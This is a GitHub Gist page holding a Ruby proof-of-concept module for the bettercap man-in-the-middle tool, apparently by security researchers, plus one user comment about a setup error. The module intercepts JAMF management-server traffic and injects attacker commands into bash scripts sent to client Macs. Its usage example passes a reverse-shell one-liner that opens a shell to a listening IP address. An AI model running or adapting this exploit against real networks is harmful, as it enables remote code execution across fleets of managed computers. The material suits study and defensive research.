-
-
Save secretsquirrel/ec0042f0409e055666b1e9939e42bf91 to your computer and use it in GitHub Desktop.
JAMF JSS MITM POC
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
=begin | |
BETTERCAP | |
Author : Matias P. Brutti | Josh Pitts | |
Email : matiasbrutti@gmail.com | |
This module is released under the MIT license. | |
Example: | |
sudo bettercap -T 192.168.1.18 --proxy-module jamf_poc.rb --jamf-server jamfcloud.com --command " bash -i >& /dev/tcp/192.168.1.4/9090 0>&1 &" --proxy-https | |
=end | |
class JamfRce < BetterCap::Proxy::HTTP::Module | |
meta( | |
'Name' => 'JamfRce', | |
'Description' => 'MITM JAMS and inject script', | |
'Version' => '1.0.0', | |
'Author' => "Matias P. Brutti, Josh Pitts", | |
'License' => 'MIT' | |
) | |
@@domain = nil | |
@@payload = nil | |
def self.on_options(opts) | |
opts.on( '--jamf-server SERVER', 'JAMF Server to intercept traffic.' ) do |v| | |
@@domain = v | |
end | |
opts.on( '--command COMMAND', 'Extension of the files to replace.' ) do |v| | |
@@payload = v | |
BetterCap::Logger.info "Payload: {#@@payload}" | |
end | |
opts.on( '--script-file FILENAME', 'File to use in order to replace the ones matching the extension.' ) do |v| | |
filename = File.expand_path v | |
unless File.exists?(filename) | |
raise BetterCap::Error, "#{filename} file does not exist." | |
end | |
@@payload = File.read(filename) | |
BetterCap::Logger.info "File Payload: {#@@payload}" | |
end | |
end | |
def initialize | |
raise BetterCap::Error, "No --jamf-server option specified for the proxy module." if @@domain.nil? | |
raise BetterCap::Error, "No --command or --script-file option specified for the proxy module." if @@payload.nil? | |
end | |
def on_request( request, response ) | |
if is_exploitable?(request, response) | |
BetterCap::Logger.info "Injecting Malicious payload into https://#{request.host}#{request.path}." | |
BetterCap::Logger.info "Injecting Malicious payload into #{@@payload}" | |
response.body.gsub!("#!/bin/bash", "#!/bin/bash\n" + @@payload + "\n") | |
end | |
end | |
private | |
def is_exploitable? ( request, response ) | |
request.host.include?(@@domain) && request.post? && request.path.include?("/client") && response.body.include?("#!/bin/bash") | |
end | |
end |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Quick question:
I added your module and watched the PoC, however when trying this I get the error:
[E] No --redirect-url option specified for the proxy module.
Is there someway I can suppress this requirement? my bettercap command looks exactly like yours except for the IPs.